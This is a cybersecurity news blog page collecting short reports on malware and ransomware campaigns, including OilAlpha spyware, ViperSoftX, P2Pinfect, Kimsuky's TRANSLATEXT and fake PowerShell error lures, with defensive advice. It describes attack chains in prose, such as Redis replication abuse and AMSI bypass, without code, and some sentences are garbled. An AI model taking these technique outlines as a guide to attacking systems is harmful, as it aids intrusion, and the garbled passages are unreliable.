Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label malware. Show all posts
Yemen
Android Spyware Humanitarian Aid Malicious Campaign malware Pro-Houthi Group Yemen

Pro-Houthi Group Deploys Android Spyware to Target Yemeni Humanitarian Orgs

 

Insikt Group's research reveals that OilAlpha, a suspected pro-Houthi entity, continues to target humanitarian and human rights organisations in Yemen. They deploy malicious Android applications to steal credentials and gather intelligence, with the ability to control aid distribution. 

Notable organisations affected include CARE International and the Norwegian Refugee Council. This report focuses on the continuous threat and recommends mitigating techniques such as social engineering skills, safe passwords, and multi-factor authentication. 

In May 2023, Insikt outfit published its first report on OilAlpha, a pro-Houthi outfit that targets humanitarian organisations in Yemen with malicious Android applications. A year later, new discoveries show that OilAlpha is still active and poses a serious threat to humanitarian activities in the region. 

A recently published report identified a new group of malicious mobile apps and infrastructure associated with OilAlpha. Employees of internationally renowned humanitarian organisations, such as Saudi Arabia's King Salman Humanitarian Aid and Relief Centre, the Norwegian Refugee Council, and CARE International, are the target audience for these applications. 

Last month researchers discovered a malicious Android file named “Cash Incentives.apk,” linked to OilAlpha's infrastructure. The app requests invasive permissions, including access to the camera, audio, SMS, contacts, and more, classifying it as a remote access trojan (RAT). Subsequent investigation identified two more malicious applications targeting the Norwegian Refugee Council and CARE International, all attempting to steal credentials and gather sensitive information. 

OilAlpha's operations include a credential theft portal under the domain kssnew[.]online. This webpage impersonates the login pages of humanitarian organisations, prompting users to enter their credentials, which are then captured by the perpetrators. 

To address this issue, organisations should create information security policies and perform social engineering and anti-phishing awareness training. Strong passwords and multi-factor authentication (MFA) can dramatically reduce the likelihood of credential theft. Furthermore, users should exercise caution when using direct messaging on social media and encrypted messages, and check the legitimacy of messages whenever possible. 

OilAlpha's operations point to a persistent effort to influence humanitarian relief distribution in Yemen. The group's focus on humanitarian organisations is expected to continue, possibly spreading outside Yemen.
Read more »
Software
ebooks Encryption malware PDF PowerShell Software

Improved ViperSoftX Malware Distributed Through eBooks

 



Researchers have found new advancements in the ViperSoftX info-stealing malware, which was first discovered in 2020. This malware has become more sophisticated, using advanced techniques to avoid detection. One of its new methods is using the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts, which are spread through pirated eBooks. This clever approach helps the malware to hide within normal system activities, making it harder for security software to detect.

How ViperSoftX Spreads

ViperSoftX spreads through torrent sites by pretending to be eBooks. The infection starts when users download a RAR archive that includes a hidden folder, a deceptive shortcut file that looks like a harmless PDF or eBook, and a PowerShell script. The archive also contains AutoIt.exe and AutoIt script files disguised as simple JPG image files. When a user clicks the shortcut file, it sets off a series of commands, starting with listing the contents of “zz1Cover4.jpg.” These commands are hidden within blank spaces and executed by PowerShell, performing various malicious actions.

What the Malware Does

According to researchers from Trellix, the PowerShell code performs several tasks, such as unhiding the hidden folder, calculating the total size of all disk drives, and setting up Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in. This ensures the malware remains active on infected systems. Additionally, the malware copies two files to the %APPDATA%MicrosoftWindows directory, renaming them to .au3 and AutoIt3.exe.

A sneaky aspect of ViperSoftX is its use of CLR to run PowerShell within AutoIt, a tool normally trusted by security software for automating Windows tasks. This allows the malware to avoid detection. ViperSoftX also uses heavy obfuscation, including Base64 encoding and AES encryption, to hide commands in the PowerShell scripts extracted from image decoy files. This makes it difficult for researchers and analysis tools to understand what the malware does.

Additionally, ViperSoftX tries to modify the Antimalware Scan Interface (AMSI) to bypass security checks. By using existing scripts, the malware developers can focus on improving their evasion tactics.

The malware's network activity shows it tries to blend its traffic with legitimate system activity. Researchers noticed it uses deceptive hostnames, like security-microsoft[.]com, to appear more trustworthy and trick victims into thinking the traffic is from Microsoft. Analysis of a Base64-encoded User-Agent string revealed detailed system information gathered from infected systems, such as disk volume serial numbers, computer names, usernames, operating system versions, antivirus product information, and cryptocurrency details.

Researchers warn that ViperSoftX is becoming more dangerous. Its ability to perform malicious actions while avoiding traditional security measures makes it a serious threat. As ViperSoftX continues to evolve, it's essential for users to stay alert and use strong security practices to protect their systems from such advanced threats.


Read more »
Ransomware
Crypto DoNex Encryption malware Ransomware

Decrypting DoNex: The Flaw That Brought Down a Ransomware Empire

Decrypting DoNex: The Flaw That Brought Down a Ransomware Empire

DoNex Ransomware Encryption: Flaw in Cryptographic Schema

Experts uncovered a critical flaw in the encryption schema of the DoNex ransomware, including all variations and predecessors. Since March 2024, they've worked with law enforcement to give a decryptor to affected DoNex victims covertly.

The cryptographic vulnerability was widely discussed at Recon 2024, compelling the researchers to reveal the problem and its ramifications publically.

The Vulnerability

Avast researchers discovered that the DoNex ransomware went through many rebrandings after its original identification as Muse in April 2022. Subsequent revisions of DoNex included a rebrand to a reported Fake LockBit 3.0 in November 2022, followed by DarkRace in May 2023, and lastly DoNex in March 2024. 

Since April 2024, the team has discovered no further copies, and the ransomware group's public TOR address remained dormant, implying that DoNex's evolution and rebranding efforts may have ended.

How It Works

The DoNex malware uses a complicated encryption method. During execution, the CryptGenRandom function generates an encryption key. This key creates a ChaCha20 symmetric key, which is later used to encrypt files.

Following encryption, the symmetric key is encrypted with RSA-4096 and appended to the impacted file. Files up to 1 MB are encrypted in their whole, whilst larger files are encrypted in block segments. An XOR-encrypted configuration file stores the ransomware's configuration, as well as information on whitelisted extensions, files, and services to terminate.

While the researchers have not described the specific process they used to understand the decryption, more information about the same cryptographic flaw is available in files related to the Recon 2024 event lecture titled "Cryptography is hard: Breaking the DoNex ransomware." The event was hosted by Gijs Rijnders, a malware reverse engineer and cyber threat intelligence specialist of the Dutch National Police.

Implications

DoNex particularly targeted victims in the United States, Italy, and Belgium with tailored attacks. The researchers confirmed that the leaked DoNex decryptor can decrypt all forms of the DoNex ransomware, including earlier versions.

Victims of the DoNex ransomware can identify an attack based on the ransom note left by the software. Although several varieties of DoNex (Fake LockBit, DarkRace, and DoNex) create different ransom notes, they all have the same layout.

  • Victim Relief: Victims no longer need to rely on paying the ransom to regain access to their files. The decryptor provides a straightforward solution.
  • Public Disclosure: The flaw was publicly discussed at the Recon 2024 conference, leading to the official release of details and the decryptor. Transparency is crucial in the fight against ransomware.
  • Ongoing Vigilance: While this breakthrough is significant, it’s essential to remain vigilant. Cybercriminals adapt quickly, and new variants may emerge. Regular backups and robust security practices remain crucial.

Read more »
URLs
Data Exfiltration HFS https malware Monero Cryptocurrency Monero Miner URLs

Hackers Attack HFS Servers to Install Malware and Mine Monero


 

Cybersecurity researchers have identified a wave of attacks targeting outdated versions of the HTTP File Server (HFS) software from Rejetto, aiming to distribute malware and cryptocurrency mining tools. These attacks exploit a critical security flaw known as CVE-2024-23692, which allows hackers to execute arbitrary commands without needing authentication.

CVE-2024-23692 is a high-severity vulnerability discovered by security researcher Arseniy Sharoglazov. It was publicly disclosed in May this year, following a detailed technical report. The flaw is a template injection vulnerability that enables remote attackers to send specially crafted HTTP requests to execute commands on the affected systems. The vulnerability affects HFS versions up to and including 2.3m. In response, Rejetto has issued a warning to users, advising against the use of these versions due to their susceptibility to control by attackers.

Researchers at AhnLab Security Intelligence Center (ASEC) have observed multiple attacks on version 2.3m of HFS. This version remains popular among individuals, small teams, educational institutions, and developers for network file sharing. The attacks likely began after the release of Metasploit modules and proof-of-concept exploits soon after the vulnerability's disclosure.

During these attacks, hackers gather information about the compromised system, install backdoors, and deploy various types of malware. Commands such as "whoami" and "arp" are executed to collect system and user information and identify connected devices. Hackers also add new users to the administrators' group and terminate the HFS process to prevent other threat actors from exploiting the same vulnerability.

In several cases, the XMRig tool, used for mining Monero cryptocurrency, was installed. ASEC researchers attribute one of these attacks to the LemonDuck threat group. Other malware payloads deployed include:

1. XenoRAT: A tool for remote access and control, often used alongside XMRig.

2. Gh0stRAT: Used for remote control and data exfiltration.

3. PlugX: A backdoor associated with Chinese-speaking threat actors, providing persistent access.

4. GoThief: An information stealer that uses Amazon AWS for data exfiltration, capturing screenshots, collecting desktop file information, and sending data to an external command and control server.

AhnLab continues to detect attacks on HFS version 2.3m. Given that the server must be online for file sharing, it remains a lucrative target for hackers. Rejetto recommends users switch to version 0.52.x, which is the latest release despite its lower version number. This version is web-based, requires minimal configuration, and supports HTTPS, dynamic DNS, and administrative panel authentication.

The company has also provided indicators of compromise, including malware hashes, IP addresses of command and control servers, and download URLs for the malware used in these attacks. Users are urged to update their software to the latest version and follow cybersecurity best practices to protect their systems from such vulnerabilities.

By assimilating and addressing these vulnerabilities, users can better secure their systems against these sophisticated attacks.


Read more »
Ticketmaster
Consumer Data malware Ransomware Taylor Swift Ticketmaster

Inside the Ticketmaster Hack: 440,000 Taylor Swift Fans at Risk

Inside the Ticketmaster Hack: 440,000 Taylor Swift Fans at Risk

In May, the hacking group ShinyHunters claimed to have gotten personal information from more than 500 million Ticketmaster users and was selling the data on the dark web, and the business has now admitted that consumer data may have been "exposed." 

The breach, initially believed to be limited in scope, has now escalated, affecting millions of ticket holders, including fans attending Taylor Swift’s Eras Tour. Let’s delve into the details of this high-stakes cybercrime.

Ticketmaster Data Breach: What You Need to Know

In an email sent to affected customers, Ticketmaster said that they had discovered "unauthorised activity" in a third-party cloud database, and that personal data of "some customers" who purchased tickets to events in North America (the United States, Canada, and/or Mexico) could have been compromised.

Ticketmaster confirmed that unauthorized access occurred, leading to the compromise of sensitive customer data. The hackers gained access to 193 million ticket barcodes, valued at an astonishing $22.6 billion. Among these, 440,000 tickets belong to Taylor Swift’s ongoing tour, leaving fans anxious and concerned.

The Ransom Demand

ShinyHunters, known for their audacity, demanded an $8 million ransom for the safe return of the stolen data. The group threatened to leak the ticket barcodes if their demands were not met promptly. Ticketmaster faced a dilemma: pay the ransom or risk exposing millions of customers’ personal information.

The American Ticket Sales and Distribution Company shared, "Ticketmaster’s SafeTix technology protects tickets by automatically refreshing a new and unique barcode every few seconds so it cannot be stolen or copied. This is just one of many fraud protections we implement to keep tickets safe and secure."

"Some outlets are inaccurately reporting about a ransom offer. We were never engaged for a ransom and did not offer them money," Ticketmaster confirmed. 

Potential Implications

1. Privacy Concerns

Customers trust platforms like Ticketmaster with their personal details, including names, addresses, and payment information. The breach jeopardizes this trust and raises questions about data security practices within the industry.

2. Financial Impact

Ticketmaster faces a double bind: pay the ransom and potentially encourage further attacks, or refuse and risk public outrage. The financial implications extend beyond the ransom amount. Legal fees, compensation to affected customers, and damage control efforts will strain the company’s resources.

3. Reputation Damage

Ticketmaster’s reputation hangs in the balance. Swift action is crucial to mitigate reputational harm. Customers may think twice before purchasing tickets through the platform, affecting future sales and partnerships.

Some Key Takeaways

  • Third-Party Risk: Organizations must carefully assess the security practices of third-party vendors who handle sensitive data.
  • Encryption Matters: While Ticketmaster’s payment card information was encrypted, it’s crucial to ensure strong encryption methods are in place.
  • Prompt Communication: Ticketmaster’s quick response in notifying affected customers demonstrates the value of timely communication during a breach.

Read more »
Ransomware
Italy malware RansomHouse RansomHub Ransomware

RansomHub and RansomHouse: Unmasking the Culprits Behind Italy’s Attacks

RansomHub and RansomHouse: Unmasking the Culprits Behind Italy’s Attacks

Hackers have claimed responsibility for three major cyberattacks in Italy in the last 24 hours. The RansomHub and RansomHouse gangs allegedly carried out the ransomware assaults in Italy. RansomHub targeted the websites of Cloud Europe and Mangimi Fusco, while RansomHouse claimed responsibility for conducting a cyberattack against Francesco Parisi.

Italy's Ransomware Attacks

Cloud Europe is a Tier IV carrier-neutral data center based in Rome's Tecnopolo Tiburtino. According to the company's website, it specializes in data center architecture and management, focusing on security and service continuity. The company creates, hosts, and operates modular infrastructure for data centers in both the private and public sectors.

The Attacks

1. Cloud Europe: On June 29, 2024, RansomHub claimed responsibility for infiltrating the servers of Cloud Europe, a prominent Tier IV certified data center in Rome. The attackers allegedly encrypted the servers and exfiltrated 70 terabytes of data. Among the stolen information were 541.41 gigabytes of sensitive data, including client records, financial documents, and proprietary software.

2. Mangimi Fusco: The same day, RansomHub targeted Mangimi Fusco, an animal food manufacturer. The group claimed to have stolen 490 gigabytes of confidential data, including client files, budget details, and payroll information. However, as of now, Mangini Fusco’s website shows no signs of the reported attack, leaving room for skepticism.

3. Francesco Parisi: RansomHouse, another hacking collective, breached the website of Francesco Parisi, a group specializing in freight forwarding and shipping services. The attack occurred on May 29, 2024, and resulted in the theft of 150 gigabytes of company data. Francesco Parisi has acknowledged the breach and is working to restore normalcy while enhancing its cybersecurity defenses.

The Implications

These attacks raise critical questions about the state of cybersecurity readiness among Italian businesses:

Vulnerabilities: Despite advancements in security protocols, organizations remain vulnerable to sophisticated attacks. The ability of threat actors to infiltrate well-established data centers and corporate websites highlights the need for continuous vigilance.

Data Privacy: The stolen data contains sensitive information that could be exploited for financial gain or used maliciously. Companies must prioritize data privacy and invest in robust encryption, access controls, and incident response plans.

Business Continuity: When ransomware strikes, business operations grind to a halt. Cloud Europe’s experience serves as a stark reminder that even data centers, designed to ensure continuity, are not immune. Organizations must have contingency plans to minimize disruptions.

How to Stay Safe?

To safeguard against ransomware and other cyber threats, companies should consider the following strategies:

  • Regular Backups: Frequent backups of critical data are essential. These backups should be stored securely and tested periodically to ensure their integrity.
  • Employee Training: Human error often opens the door to cyberattacks. Regular training sessions can educate employees about phishing emails, suspicious links, and safe online practices.
  • Multi-Factor Authentication (MFA): Implementing MFA adds an extra layer of security, making it harder for unauthorized individuals to gain access.
  • Incident Response Plans: Organizations should develop comprehensive incident response plans that outline steps to take during a breach. Swift action can minimize damage and prevent data loss.

Read more »
TRANSLATEXT
Cyberattacks CyberCrime Cyberhackers Cybersecurity CyberThreat GitHub JavaScript malware TRANSLATEXT

Kimsuky Unleashes TRANSLATEXT Malware on South Korean Academic Institutions

 


An investigation has found that a North Korea-linked threat actor, known as Kimsuky, has been involved in the use of a malicious Google Chrome extension to steal sensitive information to collect information as part of an ongoing intelligence collection effort. Observing the activity in early March 2024, Zscaler ThreatLabz has codenamed the extension TRANSLATEXT, emphasizing its ability to gather email addresses, usernames, passwords, cookies, and screenshots as well as its ability to gather this information. 

This targeted campaign is said to have targeted South Korean academia, specifically those focused on North Korean politics. There is a notorious North Korean hacker group known as Kimsuky that has been active since 2012, perpetrating cyber espionage and financial-motivated attacks against South Korean businesses. Kimsuky is widely known as a notorious hacker crew. In the remote server's PowerShell script, general information about the victim is uploaded as well as creating a Windows shortcut that enables a user to retrieve another script from the remote server through a PowerShell script. TRANSLATEXT's exact delivery method remains unclear, which makes it even more difficult for defenders to protect themselves from it. 

Despite this, Kimsuky is well known for utilizing sophisticated spear-phishing and social engineering attacks to trick the target into initiating the infection process. Two files appear to be connected to Korean military history when the attack begins, a ZIP archive that appears to contain two files, a Hangul Word Processor document and an executable file. Once the executable file has been launched, it retrieves a PowerShell script from the attacker's server. In addition to exporting the victim's information to a GitHub repository, this script also downloads additional PowerShell code via a Windows shortcut (LNK) file and executes it. 

It is clear from this multi-stage attack process that Kimsuky is an extremely sophisticated and well-planned operation. By using a familiar and seemingly legitimate document, the attackers decrease the chances of the targets being suspicious. As well as displaying an innovative method of blending malicious activities into regular internet traffic, GitHub is also utilized in the initial data export process, resulting in a much harder time finding and blocking malicious actions for traditional security systems. There are a few groups that are also associated with the Lazarus cluster or part of the Reconnaissance General Bureau (RGB). 

For instance, APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet, Springtail, and Velvet Chollima are groups that are affiliated with the Lazarus cluster. There have been several incidents in the last few weeks in which the group has weaponized a vulnerability in Microsoft Office (CVE-2017-11882), distributed a keylogger, and used job-themed lures in attacks aiming at the aerospace and defence industries to drop an espionage tool that gathers data and executes secondary payloads. "The backdoor is unknown to the public and the attacker can conduct basic reconnaissance, drop additional payloads, and then take over or remotely control the computer." 

CyberArmor said. Despite Kimsuky's recent involvement in cyber espionage, it has given this campaign the name Niki. It is no secret that Kimsuky is not a new player. Since at least 2012, the group has been active and has developed a reputation for orchestrating cyber-espionage and financial-motivated attacks primarily on South Korean institutions, which has earned them a reputation as a notorious group. It has been reported that the group has stolen classified information, and committed financial fraud, and ransomware attacks. Throughout history, they have been one of the most formidable cyber threat actors associated with North Korea due to their adaptability and persistence. 

There is no doubt that Kimsuky is capable of blending cyber espionage with financially motivated operations, indicating a versatile approach to achieving the North Korean regime's objectives, whether they are to gather intelligence or generate revenue to support it. As of right now, it is not clear what is the exact mechanism for accessing the newly discovered activity, although it is known that the group is known for utilizing spear-phishing and social engineering attacks to launch the infection cycle. 

It is believed that the attack began with the delivery of a ZIP archive with the intent of containing Korean military history at the time, which contains two files: a word processor document in Hangul and an executable at the time of the attack. As soon as the executable is launched, a PowerShell script is extracted from a server controlled by the attacker that downloads additional PowerShell code with the aid of a Windows shortcut file (LNK) and creates a GitHub repository where the compromised victim's information is periodically uploaded. 

After the GitHub repository has been created, the attacker deletes the LNK file in question. This is the statement posted by Zscaler, a security company that found a GitHub account, created on February 13, 2024, that briefly hosted the TRANSLATEXT extension under the name "GoogleTranslate.crx," regardless of how it is distributed at the moment. TRANSLATEXT, which masquerades as Google Translate, incorporates JavaScript code to bypass security measures for services like Google, Kakao, and Naver; siphon email addresses, credentials, and cookies; capture browser screenshots; and exfiltrate stolen data. It's also designed to fetch commands from a Blogger Blogspot URL to take screenshots of newly opened tabs and delete all cookies from the browser, among others.
Read more »
Ransomware
Automotive Cars CDK Global malware Ransomware

Ransomware Strikes Auto Dealerships: The CDK Global Incident

Ransomware Strikes Auto Dealerships: The CDK Global Incident

The Attack

The automotive industry has faced an unprecedented challenge: a cyberattack targeting CDK Global, a major software provider for auto dealerships. This incident has sent shockwaves through the industry, affecting dealerships across the United States. In this blog post, we’ll delve into the details of the attack, its consequences, and the lessons we can learn from it.

What Happened?

CDK Global, a company that provides software solutions to auto dealers, fell victim to a ransomware attack. The attack was orchestrated by a group known as BlackSuit, which demanded a hefty ransom from CDK. As a precautionary measure, CDK temporarily shut down most of its systems to prevent further damage and protect its customers.

Impact on U.S. Car Dealers

Several major auto dealership groups reported disruptions:

Lithia Motors: Lithia Motors, one of the largest dealership networks in the U.S., faced operational challenges due to the CDK cyberattack. Their day-to-day processes, including inventory management and customer interactions, were affected.

Group 1 Automotive: Group 1 Automotive, another prominent player in the industry, experienced delays in vehicle sales and service. The attack disrupted their ability to process transactions efficiently.

Penske Automotive Group: Penske, a well-known name in auto retail, struggled with system outages. Their sales teams couldn’t access critical information, impacting customer service.

Sonic Automotive: Sonic Automotive’s dealerships grappled with inventory discrepancies. The attack disrupted their supply chain management, leading to delays in vehicle deliveries.

Asbury Automotive Group: Asbury Automotive Group faced challenges in communicating with customers. Their CRM systems were offline, affecting follow-ups and lead management.

AutoNation: AutoNation, a nationwide dealership network, had to adapt quickly. The attack disrupted their online sales platforms, affecting customer inquiries and transactions.

How to Stay Safe?

1. Cybersecurity Preparedness

The CDK incident underscores the importance of robust cybersecurity measures. Dealerships must invest in secure infrastructure, regular vulnerability assessments, and employee training. Cyber hygiene is crucial to prevent and mitigate attacks.

2. Incident Response Plans

Having a well-defined incident response plan is essential. Dealerships should know how to react swiftly when faced with a cyber threat. Regular drills and simulations can help teams prepare for such scenarios.

3. Vendor Risk Management

Dealerships rely on third-party vendors like CDK for critical services. Assessing vendor security practices and ensuring contractual obligations related to cybersecurity are met is vital. Regular audits can help identify vulnerabilities.

Read more »
Redis Servers
cryptomining Malicious Payload malware P2P Botnets Redis Servers

P2Pinfect Worm Now Delivering Ransomware on Redis Servers

 

Cado Security experts warned that the P2Pinfect worm is used in attacks on Redis servers to deliver ransomware and cryptocurrency mining payloads. 

Palo Alto Networks Unit 42 researchers uncovered the P2P worm P2PInfect in July 2023, which targets Redis servers running Linux and Windows operating systems. P2PInfect's ability to target Redis servers running on both Linux and Windows operating systems makes it more expandable and dangerous than other worms.

Cado Security Labs identified a new strain of the P2Pinfect botnet in December 2023, specifically targeting routers, IoT devices, and other embedded devices. This variation was built for the Microprocessor without Interlocked Pipelined Stages (MIPS) architecture. The new bot includes enhanced evasion methods, the ability to evade execution in a Virtual Machine (VM) or a debugger, and anti-forensics support for Linux hosts. 

The worm is written in Rust and targets Redis instances using the Lua sandbox escape vulnerability CVE-2022-0543 (CVSS score 10.0). In September 2023, Cado Security Labs detected a 600x spike in P2Pinfect traffic since August 28. Researchers noted that the malware did not seem to have a goal other than to spread; however, a new upgrade of P2Pinfect has introduced a ransomware and crypto miner payload. 

The most recent campaign began on June 23, based on the TLS certificate used for C2 communications. The malware propagates by leveraging Redis's replication features, where nodes in a distributed cluster follow a leader/follower topology. The attackers exploited this feature by making follower nodes load arbitrary modules, allowing code execution on these nodes. P2Pinfect uses the SLAVEOF command to turn open Redis nodes into followers of a server under the control of its operator. 

“P2Pinfect is a worm, so all infected machines will scan the internet for more servers to infect with the same vector described above. P2Pinfect also features a basic SSH password sprayer, where it will try a few common passwords with a few common users, but the success of this infection vector seems to be a lot less than with Redis, likely as it is oversaturated,” Cado researchers stated. “Upon launch it drops an SSH key into the authorised key file for the current user and runs a series of commands to prevent access to the Redis instance apart from IPs belonging to existing connections.”

The war's primary binary appears to have been changed; it is now built with the Tokio async framework for Rust and includes UPX. The malware's internals have been completely unwritten; researchers discovered that the binary had been stripped and partially obfuscated to make static analysis more challenging. Previously, P2Pinfect maintained persistence by adding it to.bash_logout and running a cron job, however these methods are no longer used. Other behaviours, such as the initial setup, are unaffected.
Read more »
Ransomware
BlackSuit CISA FBI malware Ransomware

From Code to Chaos: BlackSuit Ransomware and The CDK Global Cyber Crisis


In recent days, the automotive industry has been hit by a significant IT outage that has disrupted operations for car dealerships across North America. The culprit? The notorious BlackSuit ransomware gang. In this blog post, we’ll delve into the details of the attack, its impact, and what it means for CDK Global and its customers.

The Incident

According to people familiar with the situation, the BlackSuit ransomware gang is responsible for CDK Global's significant IT failure and interruption to car dealerships throughout North America.

The conversations follow the BlackSuit ransomware assault, which led CDK to lock down its IT infrastructure and data centers, including its car dealership platform, to prevent the attack from spreading. The company attempted to restore services on Wednesday, but a second cybersecurity attack forced it to shut down all IT systems again.

The Attack

CDK Global, a leading provider of technology solutions for auto dealerships, found itself in the crosshairs of cybercriminals

While the company has yet to officially confirm the ransomware attack, multiple sources indicate that BlackSuit is behind the incident. The attack likely exploited vulnerabilities in CDK’s systems, leading to widespread disruption.

Impact on Dealerships

Two of the largest public car dealership companies, Penske Automotive Group and Sonic Automotive, disclosed that they, too, were impacted by the outages.

The fallout from the CDK Global outage has been substantial. Car dealerships rely heavily on CDK’s software for inventory management, sales, and customer service. 

With the systems down, dealers have had to resort to manual processes, including pen-and-paper record-keeping. Imagine the chaos in a busy dealership trying to manage sales, service appointments, and parts inventory without their usual digital tools.

Data Theft Concerns

Beyond the immediate operational challenges, there are serious concerns about data theft. Ransomware attacks often involve stealing sensitive information before encrypting files and demanding a ransom.

CDK Global must now investigate whether customer data, financial records, or other critical information has been compromised. The potential fallout from such a breach could be long-lasting and damaging.

Response and Recovery

In November 2023, the FBI and CISA published in a joint advisory that Royal and BlackSuit's encryptors use similar strategies and have coding overlaps.

CDK Global’s response to the attack is crucial. They need to assess the extent of the breach, restore systems, and enhance security measures. Communication with affected dealerships is equally important. Dealers need transparency about the situation, timelines for resolution, and guidance on how to navigate the outage.

Read more »
Windows malware
fake error messages malware PowerShell malware ransomware distribution social engineering attacks Windows malware

Crafty Criminals Use Fake Error Messages to Deploy Malware via PowerShell

 

Criminals are targeting thousands of organizations worldwide with social engineering attacks that use fake error messages to trick users into running malicious PowerShell scripts.

This new Windows malware campaign uses bogus error messages from Google Chrome, Microsoft Word, and OneDrive that appear legitimate. When victims visit a compromised website, they encounter a pop-up error message in their browser. This tactic, although old, remains highly effective. It's crucial to be aware of this trick to prevent others from falling for it.

Victims are instructed to click a "fix" button and paste the displayed code into a PowerShell terminal or Windows Run dialog box. This action allows PowerShell to execute another remote script that downloads and installs malware on the victim's computer.

Proofpoint malware researchers have identified at least two criminal groups using this method. One of these groups is likely using it to spread ransomware.

"Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk," stated Tommy Madjar, Dusty Miller, and Selena Larson in a recent report.

Proofpoint discovered a group named TA571 employing this PowerShell technique as early as March 1, and another gang behind the ClearFake malware campaign has been using it since early April. Both groups were still active in early June, and a third campaign, dubbed ClearFix, has been testing it out since at least May.

In these attacks, users visit a compromised website that loads a malicious script hosted on the blockchain via Binance's Smart Chain contracts, known as EtherHiding. This script then triggers a fake warning box in the browser, prompting the victim to install a "root certificate" to fix a fictitious problem.

The warning message includes instructions to copy a PowerShell script and run it manually. This script flushes the DNS cache, clears the clipboard, displays a decoy message, and then downloads and executes a remote PowerShell script.

The remote script conducts Windows Management Instrumentation checks and then deploys Lumma Stealer malware, which downloads three payloads:

am.exe – Amadey Loader
ma.exe – A downloader that installs the XMRig cryptocurrency miner with a specific configuration
cl.exe – A clipboard hijacker that replaces cryptocurrency addresses in the clipboard to redirect funds to the threat actor's address during transactions
In some cases, the Amadey malware also downloads additional malware, including a Go-based threat believed to be JaskaGo, which can target both Windows and macOS systems.

"This means that in total, five distinct malware families could be executed just by running the one initial PowerShell script," the researchers noted.

The ClearFix campaign used a similar tactic. Attackers employed a compromised website with an iframe overlay, displaying a Google Chrome error message instructing users to open "Windows PowerShell (Admin)" and paste malicious code, ultimately leading to the Vidar Stealer being downloaded and executed.

In another campaign attributed to TA571, the group sent out over 100,000 phishing emails to thousands of organizations globally. These emails contained a malicious HTML attachment disguised as a Microsoft Word page, displaying an error message about the "Word Online extension not being installed," and offering two options: "How to fix" and "Auto-fix."

Clicking "How to fix" copies a Base64-encoded PowerShell command to the clipboard, instructing the user to open PowerShell and paste the command. The "Auto-fix" button uses the search-ms protocol to display a WebDAV-hosted "fix.msi" or "fix.vbs" file.

Executing the MSI file installs Matanbuchus, another malware loader, while the VBS file downloads and runs the DarkGate attack code.

"Proofpoint assesses with high confidence that TA571 infections can lead to ransomware," the researchers said, noting that this group continually modifies its email lures and attack chains.

The security firm also provided examples of indicators of compromise and advised organizations to train employees to recognize and report suspicious activity, particularly social engineering attacks of this nature. 
Read more »
Ransomware
Data Healthcare Malicious Campaign malware Ransomware

Defending Hospitals and Clinics: Strategies Against Ransomware

Defending Hospitals and Clinics: Strategies Against Ransomware

The healthcare industry has become a prime target for ransomware attacks in recent years. These malicious campaigns exploit vulnerabilities in healthcare systems, disrupt critical services, and compromise sensitive patient data. 

According to Steve Stone, president of Rubrik's Zero Labs, ransomware is one of the levers changing how enterprises think about risk. Zero Labs' latest analysis shows that healthcare firms are more likely to lose 20% of their sensitive data after a ransomware attack.

This blog post will explore why healthcare organizations are at risk and discuss strategies to mitigate these threats.

1. Data Sensitivity and Volume

Healthcare organizations handle vast amounts of sensitive data, including patient records, medical histories, and financial information. This data is a goldmine for cybercriminals seeking economic gain. According to recent reports, healthcare data breaches cost organizations an average of $7.13 million per incident. The sheer volume of sensitive data makes healthcare an attractive target.

2. Architectural Similarities

While ransomware operators don’t exclusively focus on healthcare, the industry shares architectural nuances with other sectors. For instance:

Legacy Systems: Many healthcare institutions still rely on legacy systems that lack robust security features. These outdated systems are more susceptible to attacks.

Interconnected Networks: Healthcare networks connect various entities—hospitals, clinics, laboratories, and insurance providers. This interconnectedness creates multiple entry points for attackers.

Medical Devices: Internet of Things (IoT) devices, such as MRI machines and infusion pumps, are integral to patient care. However, they often lack proper security controls, making them vulnerable.

3. Risk Surface Area

Preventing ransomware starts with understanding your risk surface area. Here’s how healthcare organizations can reduce their exposure:

Identity Management: Properly managing user identities and access rights is crucial. Limiting access to sensitive data based on roles and responsibilities helps prevent unauthorized changes.

Data Visibility: Organizations must know where sensitive data resides, both on-premises and in the cloud. Regular audits and data classification are essential.

Backup and Recovery: Robust backup solutions are critical. Regularly backing up data ensures that even if ransomware strikes, organizations can restore systems without paying the ransom.

4. Incident Response Challenges

Healthcare organizations face unique challenges in incident response:

Hybrid Environments: Many healthcare systems operate in hybrid environments—partly on-premises and partly in the cloud. Coordinating incident response across these environments can be complex.

Patient Safety: Ransomware attacks can disrupt critical services, affecting patient care. Balancing data protection with patient safety is a delicate task.

Collaboration: Effective incident response requires collaboration among IT teams, legal departments, and external cybersecurity experts.

Read more »
Oyster Backdoor
data security Google malware Microsoft Oyster Backdoor

When Legit Downloads Go Rogue: The Oyster Backdoor Story

When Legit Downloads Go Rogue: The Oyster Backdoor Story

Researchers from Rapid7 recently uncovered a sophisticated malvertising campaign that exploits unsuspecting users searching for popular software downloads. This campaign specifically targets users seeking legitimate applications like Google Chrome and Microsoft Teams, leveraging fake software installers to distribute the Oyster backdoor, also known as Broomstick.

“Rapid7 observed that the websites were masquerading as Microsoft Teams websites, enticing users into believing they were downloading legitimate software when, in reality, they were downloading the threat actor’s malicious software,” said the report.

How the Malvertising Campaign Works

The modus operandi of this campaign involves luring users to malicious websites. The threat actors create typo-squatted sites that closely mimic legitimate platforms. For instance, users searching for Microsoft Teams might inadvertently land on a fake Microsoft Teams download page. These malicious websites host supposed software installers, enticing users to download and install the application.

Fake Installers

However, the catch lies in the content of these fake installers. When users download them, they unknowingly execute the Oyster backdoor. This stealthy piece of malware allows attackers to gain unauthorized access to compromised systems. 

Once the backdoor is in place, attackers can engage in hands-on keyboard activity, directly interacting with the compromised system. Furthermore, the Oyster backdoor can deploy additional payloads after execution, potentially leading to further compromise or data exfiltration.

Impact and Mitigation

The impact on users who fall victim to this malvertising campaign can be severe. They inadvertently install the Oyster backdoor on their systems, providing attackers with a foothold. From there, attackers can escalate privileges, steal sensitive information, or launch other attacks.

To reduce such risks, users should remain vigilant:

  • Verify Sources: Always verify the legitimacy of software sources before downloading. Avoid third-party download sites and opt for official websites or trusted app stores.
  • Security Software: Regularly update and use security software to detect and prevent malware infections.
  • User Education: Educate users about the risks of malvertising and emphasize safe browsing practices.

Read more »
Velvet Ant
